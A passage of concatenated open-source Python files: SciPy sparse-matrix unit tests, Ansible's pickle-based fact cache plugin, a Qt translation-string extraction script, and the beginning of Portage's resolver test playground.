assert_array_equal(l.multiply(m).todense(),
[[1,0,0],
[0,0,0],
[0,0,9],
[0,16,0]])
def test_lil_multiply_removal(self):
# Ticket #1427.
a = lil_matrix(np.ones((3,3)))
a *= 2.
a[0, :] = 0
class TestCOO(sparse_test_class(getset=False,
slicing=False, slicing_assign=False,
fancy_indexing=False, fancy_assign=False)):
spmatrix = coo_matrix
checked_dtypes = [np.int_, np.float_, np.complex_]
def test_constructor1(self):
# unsorted triplet format
row = array([2, 3, 1, 3, 0, 1, 3, 0, 2, 1, 2])
col = array([0, 1, 0, 0, 1, 1, 2, 2, 2, 2, 1])
data = array([6., 10., 3., 9., 1., 4.,
11., 2., 8., 5., 7.])
coo = coo_matrix((data,(row,col)),(4,3))
assert_array_equal(arange(12).reshape(4,3),coo.todense())
def test_constructor2(self):
# unsorted triplet format with duplicates (which are summed)
row = array([0,1,2,2,2,2,0,0,2,2])
col = array([0,2,0,2,1,1,1,0,0,2])
data = array([2,9,-4,5,7,0,-1,2,1,-5])
coo = coo_matrix((data,(row,col)),(3,3))
mat = matrix([[4,-1,0],[0,0,9],[-3,7,0]])
assert_array_equal(mat,coo.todense())
def test_constructor3(self):
# empty matrix
coo = coo_matrix((4,3))
assert_array_equal(coo.shape,(4,3))
assert_array_equal(coo.row,[])
assert_array_equal(coo.col,[])
assert_array_equal(coo.data,[])
assert_array_equal(coo.todense(),zeros((4,3)))
def test_constructor4(self):
# from dense matrix
mat = array([[0,1,0,0],
[7,0,3,0],
[0,4,0,0]])
coo = coo_matrix(mat)
assert_array_equal(coo.todense(),mat)
# upgrade rank 1 arrays to row matrix
mat = array([0,1,0,0])
coo = coo_matrix(mat)
assert_array_equal(coo.todense(),mat.reshape(1,-1))
# COO does not have a __getitem__ to support iteration
def test_iterator(self):
pass
def test_todia_all_zeros(self):
zeros = [[0, 0]]
dia = coo_matrix(zeros).todia()
assert_array_equal(dia.A, zeros)
def test_sum_duplicates(self):
coo = coo_matrix((4,3))
coo.sum_duplicates()
coo = coo_matrix(([1,2], ([1,0], [1,0])))
coo.sum_duplicates()
assert_array_equal(coo.A, [[2,0],[0,1]])
coo = coo_matrix(([1,2], ([1,1], [1,1])))
coo.sum_duplicates()
assert_array_equal(coo.A, [[0,0],[0,3]])
assert_array_equal(coo.row, [1])
assert_array_equal(coo.col, [1])
assert_array_equal(coo.data, [3])
def test_todok_duplicates(self):
coo = coo_matrix(([1,1,1,1], ([0,2,2,0], [0,1,1,0])))
dok = coo.todok()
assert_array_equal(dok.A, coo.A)
class TestDIA(sparse_test_class(getset=False, slicing=False, slicing_assign=False,
fancy_indexing=False, fancy_assign=False,
minmax=False, nnz_axis=False)):
spmatrix = dia_matrix
checked_dtypes = [np.int_, np.float_, np.complex_]
def test_constructor1(self):
D = matrix([[1, 0, 3, 0],
[1, 2, 0, 4],
[0, 2, 3, 0],
[0, 0, 3, 4]])
data = np.array([[1,2,3,4]]).repeat(3,axis=0)
offsets = np.array([0,-1,2])
assert_equal(dia_matrix((data,offsets), shape=(4,4)).todense(), D)
# DIA does not have a __getitem__ to support iteration
def test_iterator(self):
pass
@with_64bit_maxval_limit(3)
def test_setdiag_dtype(self):
m = dia_matrix(np.eye(3))
assert_equal(m.offsets.dtype, np.int32)
m.setdiag((3,), k=2)
assert_equal(m.offsets.dtype, np.int32)
m = dia_matrix(np.eye(4))
assert_equal(m.offsets.dtype, np.int64)
m.setdiag((3,), k=3)
assert_equal(m.offsets.dtype, np.int64)
class TestBSR(sparse_test_class(getset=False,
slicing=False, slicing_assign=False,
fancy_indexing=False, fancy_assign=False,
nnz_axis=False)):
spmatrix = bsr_matrix
checked_dtypes = [np.int_, np.float_, np.complex_]
def test_constructor1(self):
# check native BSR format constructor
indptr = array([0,2,2,4])
indices = array([0,2,2,3])
data = zeros((4,2,3))
data[0] = array([[0, 1, 2],
[3, 0, 5]])
data[1] = array([[0, 2, 4],
[6, 0, 10]])
data[2] = array([[0, 4, 8],
[12, 0, 20]])
data[3] = array([[0, 5, 10],
[15, 0, 25]])
A = kron([[1,0,2,0],[0,0,0,0],[0,0,4,5]], [[0,1,2],[3,0,5]])
Asp = bsr_matrix((data,indices,indptr),shape=(6,12))
assert_equal(Asp.todense(),A)
# infer shape from arrays
Asp = bsr_matrix((data,indices,indptr))
assert_equal(Asp.todense(),A)
def test_constructor2(self):
# construct from dense
# test zero mats
for shape in [(1,1), (5,1), (1,10), (10,4), (3,7), (2,1)]:
A = zeros(shape)
assert_equal(bsr_matrix(A).todense(),A)
A = zeros((4,6))
assert_equal(bsr_matrix(A,blocksize=(2,2)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(2,3)).todense(),A)
A = kron([[1,0,2,0],[0,0,0,0],[0,0,4,5]], [[0,1,2],[3,0,5]])
assert_equal(bsr_matrix(A).todense(),A)
assert_equal(bsr_matrix(A,shape=(6,12)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(1,1)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(2,3)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(2,6)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(2,12)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(3,12)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(6,12)).todense(),A)
A = kron([[1,0,2,0],[0,1,0,0],[0,0,0,0]], [[0,1,2],[3,0,5]])
assert_equal(bsr_matrix(A,blocksize=(2,3)).todense(),A)
def test_eliminate_zeros(self):
data = kron([1, 0, 0, 0, 2, 0, 3, 0], [[1,1],[1,1]]).T
data = data.reshape(-1,2,2)
indices = array([1, 2, 3, 4, 5, 6, 7, 8])
indptr = array([0, 3, 8])
asp = bsr_matrix((data, indices, indptr), shape=(4,20))
bsp = asp.copy()
asp.eliminate_zeros()
assert_array_equal(asp.nnz, 3*4)
assert_array_equal(asp.todense(),bsp.todense())
def test_bsr_matvec(self):
A = bsr_matrix(arange(2*3*4*5).reshape(2*4,3*5), blocksize=(4,5))
x = arange(A.shape[1]).reshape(-1,1)
assert_equal(A*x, A.todense()*x)
def test_bsr_matvecs(self):
A = bsr_matrix(arange(2*3*4*5).reshape(2*4,3*5), blocksize=(4,5))
x = arange(A.shape[1]*6).reshape(-1,6)
assert_equal(A*x, A.todense()*x)
@dec.knownfailureif(True, "BSR not implemented")
def test_iterator(self):
pass
@dec.knownfailureif(True, "known deficiency in BSR")
def test_setdiag(self):
pass
#------------------------------------------------------------------------------
# Tests for non-canonical representations (with duplicates, unsorted indices)
#------------------------------------------------------------------------------
def _same_sum_duplicate(data, *inds, **kwargs):
"""Duplicates entries to produce the same matrix"""
indptr = kwargs.pop('indptr', None)
if np.issubdtype(data.dtype, np.bool_) or \
np.issubdtype(data.dtype, np.unsignedinteger):
if indptr is None:
return (data,) + inds
else:
return (data,) + inds + (indptr,)
zeros_pos = (data == 0).nonzero()
# duplicate data
data = data.repeat(2, axis=0)
data[::2] -= 1
data[1::2] = 1
# don't spoil all explicit zeros
if zeros_pos[0].size > 0:
pos = tuple(p[0] for p in zeros_pos)
pos1 = (2*pos[0],) + pos[1:]
pos2 = (2*pos[0]+1,) + pos[1:]
data[pos1] = 0
data[pos2] = 0
inds = tuple(indices.repeat(2) for indices in inds)
if indptr is None:
return (data,) + inds
else:
return (data,) + inds + (indptr * 2,)
class _NonCanonicalMixin(object):
def spmatrix(self, D, **kwargs):
"""Replace D with a non-canonical equivalent: containing
duplicate elements and explicit zeros"""
construct = super(_NonCanonicalMixin, self).spmatrix
M = construct(D, **kwargs)
zero_pos = (M.A == 0).nonzero()
has_zeros = (zero_pos[0].size > 0)
if has_zeros:
k = zero_pos[0].size//2
M = self._insert_explicit_zero(M,
zero_pos[0][k],
zero_pos[1][k])
arg1 = self._arg1_for_noncanonical(M)
if 'shape' not in kwargs:
kwargs['shape'] = M.shape
NC = construct(arg1, **kwargs)
# check that result is valid
assert_allclose(NC.A, M.A)
# check that at least one explicit zero
if has_zeros:
assert_((NC.data == 0).any())
return NC
@dec.knownfailureif(True, 'abs broken with non-canonical matrix')
def test_abs(self):
pass
@dec.knownfailureif(True, 'bool(matrix) broken with non-canonical matrix')
def test_bool(self):
pass
@dec.knownfailureif(True, 'min/max broken with non-canonical matrix')
def test_minmax(self):
pass
@dec.knownfailureif(True, 'format conversion broken with non-canonical matrix')
def test_sparse_format_conversions(self):
pass
@dec.knownfailureif(True, 'unary ufunc overrides broken with non-canonical matrix')
def test_unary_ufunc_overrides(self):
pass
@dec.knownfailureif(True, 'some binary ufuncs fail with scalars for noncanonical matrices')
def test_binary_ufunc_overrides(self):
pass
@dec.knownfailureif(True, 'getnnz-axis broken with non-canonical matrix')
def test_getnnz_axis(self):
pass
class _NonCanonicalCompressedMixin(_NonCanonicalMixin):
def _arg1_for_noncanonical(self, M):
"""Return non-canonical constructor arg1 equivalent to M"""
data, indices, indptr = _same_sum_duplicate(M.data, M.indices,
indptr=M.indptr)
# unsorted
for start, stop in izip(indptr, indptr[1:]):
indices[start:stop] = indices[start:stop][::-1].copy()
data[start:stop] = data[start:stop][::-1].copy()
return data, indices, indptr
def _insert_explicit_zero(self, M, i, j):
M[i,j] = 0
return M
class _NonCanonicalCSMixin(_NonCanonicalCompressedMixin):
@dec.knownfailureif(True, '__getitem__ with non-canonical matrix broken for sparse boolean index due to __gt__')
def test_fancy_indexing_sparse_boolean(self):
pass
@dec.knownfailureif(True, 'broadcasting element-wise multiply broken with non-canonical matrix')
def test_elementwise_multiply_broadcast(self):
pass
@dec.knownfailureif(True, 'inverse broken with non-canonical matrix')
def test_inv(self):
pass
@dec.knownfailureif(True, 'solve broken with non-canonical matrix')
def test_solve(self):
pass
class TestCSRNonCanonical(_NonCanonicalCSMixin, TestCSR):
@dec.knownfailureif(True, 'nnz counts explicit zeros')
def test_empty(self):
pass
class TestCSCNonCanonical(_NonCanonicalCSMixin, TestCSC):
@dec.knownfailureif(True, 'nnz counts explicit zeros')
def test_empty(self):
pass
@dec.knownfailureif(True, 'nonzero reports explicit zeros')
def test_nonzero(self):
pass
class TestBSRNonCanonical(_NonCanonicalCompressedMixin, TestBSR):
def _insert_explicit_zero(self, M, i, j):
x = M.tocsr()
x[i,j] = 0
return x.tobsr(blocksize=M.blocksize)
@dec.knownfailureif(True, 'unary ufunc overrides broken with non-canonical BSR')
def test_diagonal(self):
pass
@dec.knownfailureif(True, 'unary ufunc overrides broken with non-canonical BSR')
def test_expm(self):
pass
@dec.knownfailureif(True, 'inequalities require sum_duplicates, not implemented for BSR')
def test_eq(self):
pass
@dec.knownfailureif(True, 'inequalities require sum_duplicates, not implemented for BSR')
def test_ne(self):
pass
@dec.knownfailureif(True, 'inequalities require sum_duplicates, not implemented for BSR')
def test_gt(self):
pass
@dec.knownfailureif(True, 'inequalities require sum_duplicates, not implemented for BSR')
def test_lt(self):
pass
@dec.knownfailureif(True, 'inequalities require sum_duplicates, not implemented for BSR')
def test_ge(self):
pass
@dec.knownfailureif(True, 'inequalities require sum_duplicates, not implemented for BSR')
def test_le(self):
pass
@dec.knownfailureif(True, 'maximum and minimum fail for non-canonical BSR')
def test_maximum_minimum(self):
pass
@dec.knownfailureif(True, 'nnz counts explicit zeros')
def test_empty(self):
pass
class TestCOONonCanonical(_NonCanonicalMixin, TestCOO):
def _arg1_for_noncanonical(self, M):
"""Return non-canonical constructor arg1 equivalent to M"""
data, row, col = _same_sum_duplicate(M.data, M.row, M.col)
return data, (row, col)
def _insert_explicit_zero(self, M, i, j):
M.data = np.r_[M.data.dtype.type(0), M.data]
M.row = np.r_[M.row.dtype.type(i), M.row]
M.col = np.r_[M.col.dtype.type(j), M.col]
return M
def test_setdiag_noncanonical(self):
m = self.spmatrix(np.eye(3))
m.sum_duplicates()
m.setdiag([3, 2], k=1)
m.sum_duplicates()
assert_(np.all(np.diff(m.col) >= 0))
@dec.knownfailureif(True, 'nnz counts explicit zeros')
def test_empty(self):
pass
class Test64Bit(object):
TEST_CLASSES = [TestBSR, TestCOO, TestCSC, TestCSR, TestDIA,
# lil/dok->other conversion operations have get_index_dtype
TestDOK, TestLIL
]
MAT_CLASSES = [bsr_matrix, coo_matrix, csc_matrix, csr_matrix, dia_matrix]
# The following features are missing, so skip the tests:
SKIP_TESTS = {
'test_expm': 'expm for 64-bit indices not available',
'test_solve': 'linsolve for 64-bit indices not available'
}
def _create_some_matrix(self, mat_cls, m, n):
return mat_cls(np.random.rand(m, n))
def _compare_index_dtype(self, m, dtype):
dtype = np.dtype(dtype)
if isinstance(m, csc_matrix) or isinstance(m, csr_matrix) \
or isinstance(m, bsr_matrix):
return (m.indices.dtype == dtype) and (m.indptr.dtype == dtype)
elif isinstance(m, coo_matrix):
return (m.row.dtype == dtype) and (m.col.dtype == dtype)
elif isinstance(m, dia_matrix):
return (m.offsets.dtype == dtype)
else:
raise ValueError("matrix %r has no integer indices" % (m,))
def test_decorator_maxval_limit(self):
# Test that the with_64bit_maxval_limit decorator works
@with_64bit_maxval_limit(maxval_limit=10)
def check(mat_cls):
m = mat_cls(np.random.rand(10, 1))
assert_(self._compare_index_dtype(m, np.int32))
m = mat_cls(np.random.rand(11, 1))
assert_(self._compare_index_dtype(m, np.int64))
for mat_cls in self.MAT_CLASSES:
yield check, mat_cls
def test_decorator_maxval_random(self):
# Test that the with_64bit_maxval_limit decorator works (2)
@with_64bit_maxval_limit(random=True)
def check(mat_cls):
seen_32 = False
seen_64 = False
for k in range(100):
m = self._create_some_matrix(mat_cls, 9, 9)
seen_32 = seen_32 or self._compare_index_dtype(m, np.int32)
seen_64 = seen_64 or self._compare_index_dtype(m, np.int64)
if seen_32 and seen_64:
break
else:
raise AssertionError("both 32 and 64 bit indices not seen")
for mat_cls in self.MAT_CLASSES:
yield check, mat_cls
def _check_resiliency(self, **kw):
# Resiliency test, to check that sparse matrices deal reasonably
# with varying index data types.
skip = kw.pop('skip', ())
@with_64bit_maxval_limit(**kw)
def check(cls, method_name):
instance = cls()
if hasattr(instance, 'setup'):
instance.setup()
try:
getattr(instance, method_name)()
finally:
if hasattr(instance, 'teardown'):
instance.teardown()
for cls in self.TEST_CLASSES:
for method_name in dir(cls):
method = getattr(cls, method_name)
if (method_name.startswith('test_') and
not getattr(method, 'slow', False) and
(cls.__name__ + '.' + method_name) not in skip):
msg = self.SKIP_TESTS.get(method_name)
yield dec.skipif(msg, msg)(check), cls, method_name
def test_resiliency_limit_10(self):
for t in self._check_resiliency(maxval_limit=10):
yield t
def test_resiliency_random(self):
# bsr_matrix.eliminate_zeros relies on csr_matrix constructor
# not making copies of index arrays --- this is not
# necessarily true when we pick the index data type randomly
skip = ['TestBSR.test_eliminate_zeros']
for t in self._check_resiliency(random=True, skip=skip):
yield t
def test_resiliency_all_32(self):
for t in self._check_resiliency(fixed_dtype=np.int32):
yield t
def test_resiliency_all_64(self):
for t in self._check_resiliency(fixed_dtype=np.int64):
yield t
def test_no_64(self):
for t in self._check_resiliency(assert_32bit=True):
yield t
def test_downcast_intp(self):
# Check that bincount and ufunc.reduceat intp downcasts are
# dealt with. The point here is to trigger points in the code
# that can fail on 32-bit systems when using 64-bit indices,
# due to use of functions that only work with intp-size
# indices.
@with_64bit_maxval_limit(fixed_dtype=np.int64,
downcast_maxval=1)
def check_limited():
# These involve indices larger than `downcast_maxval`
a = csc_matrix([[1, 2], [3, 4], [5, 6]])
assert_raises(AssertionError, a.getnnz, axis=1)
assert_raises(AssertionError, a.sum, axis=0)
a = csr_matrix([[1, 2, 3], [3, 4, 6]])
assert_raises(AssertionError, a.getnnz, axis=0)
a = coo_matrix([[1, 2, 3], [3, 4, 5]])
assert_raises(AssertionError, a.getnnz, axis=0)
@with_64bit_maxval_limit(fixed_dtype=np.int64)
def check_unlimited():
# These involve indices larger than `downcast_maxval`
a = csc_matrix([[1, 2], [3, 4], [5, 6]])
a.getnnz(axis=1)
a.sum(axis=0)
a = csr_matrix([[1, 2, 3], [3, 4, 6]])
a.getnnz(axis=0)
a = coo_matrix([[1, 2, 3], [3, 4, 5]])
a.getnnz(axis=0)
check_limited()
check_unlimited()
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause |
gregdek/ansible | lib/ansible/plugins/cache/pickle.py | 64 | 1997 | # (c) 2017, Brian Coca
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
cache: pickle
short_description: Pickle formatted files.
description:
- This cache uses Python's pickle serialization format, in per host files, saved to the filesystem.
version_added: "2.3"
author: Brian Coca (@bcoca)
options:
_uri:
required: True
description:
- Path in which the cache plugin will save the files
env:
- name: ANSIBLE_CACHE_PLUGIN_CONNECTION
ini:
- key: fact_caching_connection
section: defaults
_prefix:
description: User defined prefix to use when creating the files
env:
- name: ANSIBLE_CACHE_PLUGIN_PREFIX
ini:
- key: fact_caching_prefix
section: defaults
_timeout:
default: 86400
description: Expiration timeout for the cache plugin data
env:
- name: ANSIBLE_CACHE_PLUGIN_TIMEOUT
ini:
- key: fact_caching_timeout
section: defaults
'''
try:
import cPickle as pickle
except ImportError:
import pickle
from ansible.module_utils.six import PY3
from ansible.plugins.cache import BaseFileCacheModule
class CacheModule(BaseFileCacheModule):
"""
A caching module backed by pickle files.
"""
def _load(self, filepath):
# Pickle is a binary format
with open(filepath, 'rb') as f:
if PY3:
return pickle.load(f, encoding='bytes')
else:
return pickle.load(f)
def _dump(self, value, filepath):
with open(filepath, 'wb') as f:
# Use pickle protocol 2 which is compatible with Python 2.3+.
pickle.dump(value, f, protocol=2)
| gpl-3.0 |
pashakiz/DonCoin | share/qt/extract_strings_qt.py | 2945 | 1844 | #!/usr/bin/python
'''
Extract _("...") strings for translation and convert to Qt4 stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import glob
import operator
OUT_CPP="src/qt/bitcoinstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
files = glob.glob('src/*.cpp') + glob.glob('src/*.h')
# xgettext -n --keyword=_ $FILES
child = Popen(['xgettext','--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out)
f = open(OUT_CPP, 'w')
f.write("""#include <QtGlobal>
// Automatically generated by extract_strings.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *bitcoin_strings[] = {\n')
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("bitcoin-core", %s),\n' % ('\n'.join(msgid)))
f.write('};')
f.close()
| mit |
candrews/portage | pym/portage/tests/resolver/ResolverPlayground.py | 2 | 28046 | # Copyright 2010-2015 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
from itertools import permutations
import fnmatch
import sys
import tempfile
import portage
from portage import os
from portage import shutil
from portage.const import (GLOBAL_CONFIG_PATH, PORTAGE_BASE_PATH,
USER_CONFIG_PATH)
from portage.dep import Atom, _repo_separator
from portage.package.ebuild.config import config
from portage.package.ebuild.digestgen import digestgen
from portage._sets import load_default_config
from portage._sets.base import InternalPackageSet
from portage.tests import cnf_path
from portage.util import ensure_dirs, normalize_path
from portage.versions import catsplit
import _emerge
from _emerge.actions import calc_depclean
from _emerge.Blocker import Blocker
from _emerge.create_depgraph_params import create_depgraph_params
from _emerge.depgraph import backtrack_depgraph
from _emerge.RootConfig import RootConfig
if sys.hexversion >= 0x3000000:
# pylint: disable=W0622
basestring = str
class ResolverPlayground(object):
"""
This class helps to create the necessary files on disk and
the needed settings instances, etc. for the resolver to do
its work.
"""
config_files = frozenset(("eapi", "layout.conf", "make.conf", "package.accept_keywords",
"package.keywords", "package.license", "package.mask", "package.properties",
"package.provided", "packages",
"package.unmask", "package.use", "package.use.aliases", "package.use.stable.mask",
"soname.provided",
"unpack_dependencies", "use.aliases", "use.force", "use.mask", "layout.conf"))
metadata_xml_template = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "http://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata>
<herd>%(herd)s</herd>
<maintainer>
<email>maintainer-needed@gentoo.org</email>
<description>Description of the maintainership</description>
</maintainer>
<longdescription>Long description of the package</longdescription>
<use>
%(flags)s
</use>
</pkgmetadata>
"""
def __init__(self, ebuilds={}, binpkgs={}, installed={}, profile={}, repo_configs={}, \
user_config={}, sets={}, world=[], world_sets=[], distfiles={},
eprefix=None, targetroot=False, debug=False):
"""
ebuilds: cpv -> metadata mapping simulating available ebuilds.
installed: cpv -> metadata mapping simulating installed packages.
If a metadata key is missing, it gets a default value.
profile: settings defined by the profile.
"""
self.debug = debug
if eprefix is None:
self.eprefix = normalize_path(tempfile.mkdtemp())
else:
self.eprefix = normalize_path(eprefix)
# Tests may override portage.const.EPREFIX in order to
# simulate a prefix installation. It's reasonable to do
# this because tests should be self-contained such that
# the "real" value of portage.const.EPREFIX is entirely
# irrelevant (see bug #492932).
portage.const.EPREFIX = self.eprefix.rstrip(os.sep)
self.eroot = self.eprefix + os.sep
if targetroot:
self.target_root = os.path.join(self.eroot, 'target_root')
else:
self.target_root = os.sep
self.distdir = os.path.join(self.eroot, "var", "portage", "distfiles")
self.pkgdir = os.path.join(self.eprefix, "pkgdir")
self.vdbdir = os.path.join(self.eroot, "var/db/pkg")
os.makedirs(self.vdbdir)
if not debug:
portage.util.noiselimit = -2
self._repositories = {}
#Make sure the main repo is always created
self._get_repo_dir("test_repo")
self._create_distfiles(distfiles)
self._create_ebuilds(ebuilds)
self._create_binpkgs(binpkgs)
self._create_installed(installed)
self._create_profile(ebuilds, installed, profile, repo_configs, user_config, sets)
self._create_world(world, world_sets)
self.settings, self.trees = self._load_config()
self._create_ebuild_manifests(ebuilds)
portage.util.noiselimit = 0
def reload_config(self):
"""
Reload configuration from disk, which is useful if it has
been modified after the constructor has been called.
"""
for eroot in self.trees:
portdb = self.trees[eroot]["porttree"].dbapi
portdb.close_caches()
self.settings, self.trees = self._load_config()
def _get_repo_dir(self, repo):
"""
Create the repo directory if needed.
"""
if repo not in self._repositories:
if repo == "test_repo":
self._repositories["DEFAULT"] = {"main-repo": repo}
repo_path = os.path.join(self.eroot, "var", "repositories", repo)
self._repositories[repo] = {"location": repo_path}
profile_path = os.path.join(repo_path, "profiles")
try:
os.makedirs(profile_path)
except os.error:
pass
repo_name_file = os.path.join(profile_path, "repo_name")
with open(repo_name_file, "w") as f:
f.write("%s\n" % repo)
return self._repositories[repo]["location"]
def _create_distfiles(self, distfiles):
os.makedirs(self.distdir)
for k, v in distfiles.items():
with open(os.path.join(self.distdir, k), 'wb') as f:
f.write(v)
def _create_ebuilds(self, ebuilds):
for cpv in ebuilds:
a = Atom("=" + cpv, allow_repo=True)
repo = a.repo
if repo is None:
repo = "test_repo"
metadata = ebuilds[cpv].copy()
copyright_header = metadata.pop("COPYRIGHT_HEADER", None)
eapi = metadata.pop("EAPI", "0")
misc_content = metadata.pop("MISC_CONTENT", None)
metadata.setdefault("DEPEND", "")
metadata.setdefault("SLOT", "0")
metadata.setdefault("KEYWORDS", "x86")
metadata.setdefault("IUSE", "")
unknown_keys = set(metadata).difference(
portage.dbapi.dbapi._known_keys)
if unknown_keys:
raise ValueError("metadata of ebuild '%s' contains unknown keys: %s" %
(cpv, sorted(unknown_keys)))
repo_dir = self._get_repo_dir(repo)
ebuild_dir = os.path.join(repo_dir, a.cp)
ebuild_path = os.path.join(ebuild_dir, a.cpv.split("/")[1] + ".ebuild")
try:
os.makedirs(ebuild_dir)
except os.error:
pass
with open(ebuild_path, "w") as f:
if copyright_header is not None:
f.write(copyright_header)
f.write('EAPI="%s"\n' % eapi)
for k, v in metadata.items():
f.write('%s="%s"\n' % (k, v))
if misc_content is not None:
f.write(misc_content)
def _create_ebuild_manifests(self, ebuilds):
tmpsettings = config(clone=self.settings)
tmpsettings['PORTAGE_QUIET'] = '1'
for cpv in ebuilds:
a = Atom("=" + cpv, allow_repo=True)
repo = a.repo
if repo is None:
repo = "test_repo"
repo_dir = self._get_repo_dir(repo)
ebuild_dir = os.path.join(repo_dir, a.cp)
ebuild_path = os.path.join(ebuild_dir, a.cpv.split("/")[1] + ".ebuild")
portdb = self.trees[self.eroot]["porttree"].dbapi
tmpsettings['O'] = ebuild_dir
if not digestgen(mysettings=tmpsettings, myportdb=portdb):
raise AssertionError('digest creation failed for %s' % ebuild_path)
def _create_binpkgs(self, binpkgs):
# When using BUILD_ID, there can be mutiple instances for the
# same cpv. Therefore, binpkgs may be an iterable instead of
# a dict.
items = getattr(binpkgs, 'items', None)
items = items() if items is not None else binpkgs
for cpv, metadata in items:
a = Atom("=" + cpv, allow_repo=True)
repo = a.repo
if repo is None:
repo = "test_repo"
pn = catsplit(a.cp)[1]
cat, pf = catsplit(a.cpv)
metadata = metadata.copy()
metadata.setdefault("SLOT", "0")
metadata.setdefault("KEYWORDS", "x86")
metadata.setdefault("BUILD_TIME", "0")
metadata["repository"] = repo
metadata["CATEGORY"] = cat
metadata["PF"] = pf
repo_dir = self.pkgdir
category_dir = os.path.join(repo_dir, cat)
if "BUILD_ID" in metadata:
binpkg_path = os.path.join(category_dir, pn,
"%s-%s.xpak"% (pf, metadata["BUILD_ID"]))
else:
binpkg_path = os.path.join(category_dir, pf + ".tbz2")
ensure_dirs(os.path.dirname(binpkg_path))
t = portage.xpak.tbz2(binpkg_path)
t.recompose_mem(portage.xpak.xpak_mem(metadata))
def _create_installed(self, installed):
for cpv in installed:
a = Atom("=" + cpv, allow_repo=True)
repo = a.repo
if repo is None:
repo = "test_repo"
vdb_pkg_dir = os.path.join(self.vdbdir, a.cpv)
try:
os.makedirs(vdb_pkg_dir)
except os.error:
pass
metadata = installed[cpv].copy()
metadata.setdefault("SLOT", "0")
metadata.setdefault("BUILD_TIME", "0")
metadata.setdefault("COUNTER", "0")
metadata.setdefault("KEYWORDS", "~x86")
unknown_keys = set(metadata).difference(
portage.dbapi.dbapi._known_keys)
unknown_keys.discard("BUILD_TIME")
unknown_keys.discard("BUILD_ID")
unknown_keys.discard("COUNTER")
unknown_keys.discard("repository")
unknown_keys.discard("USE")
unknown_keys.discard("PROVIDES")
unknown_keys.discard("REQUIRES")
if unknown_keys:
raise ValueError("metadata of installed '%s' contains unknown keys: %s" %
(cpv, sorted(unknown_keys)))
metadata["repository"] = repo
for k, v in metadata.items():
with open(os.path.join(vdb_pkg_dir, k), "w") as f:
f.write("%s\n" % v)
def _create_profile(self, ebuilds, installed, profile, repo_configs, user_config, sets):
user_config_dir = os.path.join(self.eroot, USER_CONFIG_PATH)
try:
os.makedirs(user_config_dir)
except os.error:
pass
for repo in self._repositories:
if repo == "DEFAULT":
continue
repo_dir = self._get_repo_dir(repo)
profile_dir = os.path.join(repo_dir, "profiles")
metadata_dir = os.path.join(repo_dir, "metadata")
os.makedirs(metadata_dir)
#Create $REPO/profiles/categories
categories = set()
for cpv in ebuilds:
ebuilds_repo = Atom("="+cpv, allow_repo=True).repo
if ebuilds_repo is None:
ebuilds_repo = "test_repo"
if ebuilds_repo == repo:
categories.add(catsplit(cpv)[0])
categories_file = os.path.join(profile_dir, "categories")
with open(categories_file, "w") as f:
for cat in categories:
f.write(cat + "\n")
#Create $REPO/profiles/license_groups
license_file = os.path.join(profile_dir, "license_groups")
with open(license_file, "w") as f:
f.write("EULA TEST\n")
repo_config = repo_configs.get(repo)
if repo_config:
for config_file, lines in repo_config.items():
if config_file not in self.config_files and not any(fnmatch.fnmatch(config_file, os.path.join(x, "*")) for x in self.config_files):
raise ValueError("Unknown config file: '%s'" % config_file)
if config_file in ("layout.conf",):
file_name = os.path.join(repo_dir, "metadata", config_file)
else:
file_name = os.path.join(profile_dir, config_file)
if "/" in config_file and not os.path.isdir(os.path.dirname(file_name)):
os.makedirs(os.path.dirname(file_name))
with open(file_name, "w") as f:
for line in lines:
f.write("%s\n" % line)
# Temporarily write empty value of masters until it becomes default.
# TODO: Delete all references to "# use implicit masters" when empty value becomes default.
if config_file == "layout.conf" and not any(line.startswith(("masters =", "# use implicit masters")) for line in lines):
f.write("masters =\n")
#Create $profile_dir/eclass (we fail to digest the ebuilds if it's not there)
os.makedirs(os.path.join(repo_dir, "eclass"))
# Temporarily write empty value of masters until it becomes default.
if not repo_config or "layout.conf" not in repo_config:
layout_conf_path = os.path.join(repo_dir, "metadata", "layout.conf")
with open(layout_conf_path, "w") as f:
f.write("masters =\n")
if repo == "test_repo":
#Create a minimal profile in /usr/portage
sub_profile_dir = os.path.join(profile_dir, "default", "linux", "x86", "test_profile")
os.makedirs(sub_profile_dir)
if not (profile and "eapi" in profile):
eapi_file = os.path.join(sub_profile_dir, "eapi")
with open(eapi_file, "w") as f:
f.write("0\n")
make_defaults_file = os.path.join(sub_profile_dir, "make.defaults")
with open(make_defaults_file, "w") as f:
f.write("ARCH=\"x86\"\n")
f.write("ACCEPT_KEYWORDS=\"x86\"\n")
use_force_file = os.path.join(sub_profile_dir, "use.force")
with open(use_force_file, "w") as f:
f.write("x86\n")
